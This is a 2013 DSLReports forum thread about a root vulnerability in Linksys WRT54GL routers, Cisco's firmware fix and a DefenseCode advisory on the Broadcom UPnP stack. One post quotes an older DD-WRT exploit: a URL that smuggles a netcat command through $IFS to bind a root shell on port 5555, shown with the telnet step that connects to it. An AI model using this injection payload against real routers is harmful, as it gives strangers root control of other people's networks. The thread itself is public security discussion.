dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
3816
share rss forum feed

ke4pym
Premium
join:2004-07-24
Charlotte, NC
reply to antdude

Re: Dangerous remote Linksys 0-day root exploit discovered

Hey, since Cisco is going to go back to fix this bug, maybe they can fix it so you can use modern browsers to access the administrator console!

Or would that be asking too much?


pandora
Premium
join:2001-06-01
Outland
kudos:2
Reviews:
·ooma
·Google Voice
·Comcast
·Future Nine Corp..
reply to Smokey Bear

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video -

We're still investigating some tricks to exploit this vulnerability from the internet, but for now, yes - it seems safe from the outside of the network. Of course, unless services are available from the internet.

Regards,

Leon Juranic

CEO

DefenseCode



It isn't clear if this exploit affects Tomato, Tomato USB, DD-WRT or any other open source variant of Linux based routers.
--
"If you put the federal government in charge of the Sahara Desert, in 5 years there'd be a shortage of sand." - Milton Friedman"


NetFixer
Freedom is NOT Free
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to AVD

said by AVD:

said by NetFixer:

said by [NetFixer :

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree, think public access to a coffee shop or whatnot. A public user on the wlan should not be able to root the router. This is not the same a physical/software security.

And a properly setup public WiFi hotspot will not allow access by WiFi guests to the underlying infrastructure, or between WiFi clients. I have setup many such hotspots, and I used at least small business class routers and separate access points that can be setup to be secure. I have never setup a public WiFi hotspot using a residential grade WiFi router (although I have replaced those with proper equipment).

[sermon]Any business that operates a public WiFi hotspot without using the proper equipment that has been securely configured is just begging to be owned.[/sermon]
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


BoToMaTiC

join:2003-10-29
Louisville, KY

1 recommendation

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en-us/supp···/WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.



antdude
A Ninja Ant
Premium,VIP
join:2001-03-25
United State
kudos:4
Reviews:
·Time Warner Cable

said by BoToMaTiC:

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en-us/supp···/WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

XSS = Cross Site Scripting?
--
Ant @ AQFL.net and AntFarm.ma.cx. Please do not IM/e-mail me for technical support. Use this forum or better, »community.norton.com ! Disclaimer: The views expressed in this posting are mine, and do not necessarily reflect the views of my employer.


no__1__here
Premium
join:2003-10-13
Tomball, TX
reply to pandora

said by pandora:

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.
--
COL 2:8

"Relativism just isn't true for me." - Hillary Putnam


NetFixer
Freedom is NOT Free
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to EGeezer

said by EGeezer:

said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.

Yes, that (like the vulnerability this thread is about) is strictly a LAN side vulnerability, but an unnecessary one in my opinion. It just makes an XSS attack (which the vulnerability this thread is about seems to be) that much easier. Changing the default values for the LAN side of a residential/soho router has long been a sage security recommendation, and a deliberate bypassing of that measure by the manufacturer just does not seem like a wise move to me.
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.

pandora
Premium
join:2001-06-01
Outland
kudos:2
Reviews:
·ooma
·Google Voice
·Comcast
·Future Nine Corp..

1 recommendation

reply to no__1__here

said by no__1__here:

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

Cisco's patch is up for the WRT54GL, says it fixes issue with XSS (cross site scripting).
--
"If you put the federal government in charge of the Sahara Desert, in 5 years there'd be a shortage of sand." - Milton Friedman"


siljaline
I'm lovin' that double wide
Premium
join:2002-10-12
Montreal, QC
kudos:17
Reviews:
·Bell Sympatico

1 recommendation

reply to antdude

Unless already mentioned:
Linksys vuln: Cisco responds - Working on fix for WRT54GL router
»www.theregister.co.uk/2013/01/17···ys_vuln/



NetFixer
Freedom is NOT Free
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to antdude

Could this "new" exploit just be a variation of an old (2009) Linksys/DD-WRT router vulnerability?

Amazing new exploit for Linksys routers running DD-WRT

The vulnerability enables one-liner ownership of DD-WRT boxes. For example, typing the following into your browser while within a hot spot served by a DD-WRT router will provide root shell access on port 5555:

http://cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

It looks a bit cryptic until you remove the $IFS’es, which are just there to insert spaces in the command:

http://routerIP/cgi-bin/;nc -l -p \5555 -e /bin/sh

With the spaces removed, you can see this is just a call to the venerable netcat (i.e. “nc”) command, which sets up a tiny server on port 5555 running the shell (/bin/sh). Once the shell service is thus initiated, you can log in using telnet and execute commands – note that the shell prompt is not displayed:

$ telnet routerIP 5555


--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


Smokey Bear
veritas odium parit
Premium
join:2008-03-15
Annie's Pub
kudos:4
reply to antdude

Update DefenseCode Security Blog | January 30, 2013

said by DefenseCode :
During the security evaluation of Cisco Linksys routers for a client, we have discovered a critical security vulnerability that allows remote unauthenticated attacker to remotely execute arbitrary code under root privileges.
Upon initial vulnerability announcement a few weeks ago Cisco spokesman stated that only one router model is vulnerable - WRT54GL.
We have continued with our research and found that, in fact, same vulnerable firmware component is also used in at least two other Cisco Linksys models - WRT54G3G and probably WRT310N. Could be others.

Moreover, vulnerability turns out even more dangerous, since we have discovered that same vulnerable firmware component is also used across many other big-brand router manufacturers and many
smaller vendors.

Vulnerability itself is located in Broadcom UPnP stack, which is used by many router manufacturers that produce or produced routers based on Broadcom chipset. We have contacted them with vulnerability details and we expect patches soon.
However, we would like to point out that we have sent more than 200 e-mails to various router manufacturers and various people, without much success.

Some of the manufacturers contacted regarding this vulnerability are:

- Broadcom
- Asus
- Cisco
- TP-Link
- Zyxel
- D-Link
- Netgear
- US Robotics
- and so on.
Source: »blog.defensecode.com/2013/01/bro···ode.html

DefenseCode Security Advisory Broadcom UPnP Remote Preauth Code Execution Vulnerability (PDF): »www.defensecode.com/public/Defen···sory.pdf
--
»bit.ly/gUqYaH - C. Brian Smith: Think of the exclamation point as a car horn: a little goes a long way. Lay on it too hard and everyone’s going to think you’re a moron.
»bit.ly/V5mACB - How-To: Destroying a faulty keyboard


norwegian
Premium
join:2005-02-15
Outback

After reading this - is the upnp part relative to this topic?
»Security Flaws in Universal Plug-n-Play: Unplug, Don't Play

I'm not sure where to post now, but I'm being specific to Broadcom chipsets and this topic isn't a discussion on them.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke


redwolfe_98
Premium
join:2001-06-11
kudos:1
Reviews:
·Time Warner Cable
reply to antdude

i said, one time, not too long ago, that i was leary of using routers because i suspected that they had backdoors that could be used for hacking..

if i needed a router, i would use one, but i don't need one since i only use a single computer (so i don't use one, just to serve as a firewall)..

i saw, one time, where someone said that their network had been hacked and that all of the data on their computers had been destroyed, and i suspected that their network had been compromised by a backdoor in their router..

it is surprising that no one has said anything about all of these routers having backdoors built into them, before now.. you would have thought that someone would have checked this stuff, years ago..

reading about the issue with the baracuda routers, baracuda's response was to say that they "fixed" the problem-by reducing the number of backdoors that are built into their routers, leaving only two open.. that is a relief.. only two backdoors to worry about..

likewise, cisco says they fixed the problem when they didn't..